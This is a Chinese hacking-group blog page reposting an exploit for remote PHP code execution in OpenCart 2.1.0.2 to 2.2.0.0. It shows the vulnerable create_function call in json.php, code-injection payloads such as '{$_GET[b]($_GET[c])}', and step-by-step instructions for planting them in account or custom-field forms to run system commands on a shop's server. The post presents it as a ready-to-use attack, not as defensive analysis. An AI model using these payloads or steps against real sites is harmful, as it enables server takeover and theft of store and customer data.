注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[EXP]OpenCart 2.2.0.0 Remote PHP Code Execution  

2016-04-19 16:49:52|  分类: Web_0day |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
##
# OpenCart json_decode function Remote PHP Code Execution
#
# Author: Naser Farhadi
# Twitter: @naserfarhadi
#
# Date: 9 April 2016 # Version: 2.1.0.2 to 2.2.0.0 (Latest version)
# Vendor Homepage: http://www.opencart.com/
#
# Vulnerability:
# ------------
# /upload/system/helper/json.php
# $match = '/".*?(?<!\)"/';
# $string = preg_replace($match, '', $json);
# $string = preg_replace('/[,:{}[]0-9.-+Eaeflnr-u \n\rt]/', '', $string);
# ...
# $function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
# $return = ($function) ? $function() : null;
# ...
# return $return;
#
# Exploit(json_decode):
# ------------
# var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
# var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
# var_dump(json_decode('{"ok":"1"."2"."3"}'));
#
# Real World Exploit(OpenCart /index.php?route=account/edit)
# ------------
# go to http://host/shop_directory/index.php?route=account/edit
# fill $_SERVER[HTTP_USER_AGENT] as First Name
# /** save it two times **/
# Code execution happens when an admin user visits the administration panel, in this example 
# admin user sees his user agent as your First Name in Recent Activity :D
#
# Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
# ------------
# if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
# user information like extra phone number,... you can directly execute your injected code.
# go to http://host/shop_directory/index.php?route=account/edit
# fill {$_GET[b]($_GET[c])} as Custom Field value
# save it
# go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
#
# Note:
# ------------
# Exploit only works if PHP JSON extension is not installed.
#
# Video: https://youtu.be/1Ai09IQK4C0
##
  评论这张
 
阅读(736)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016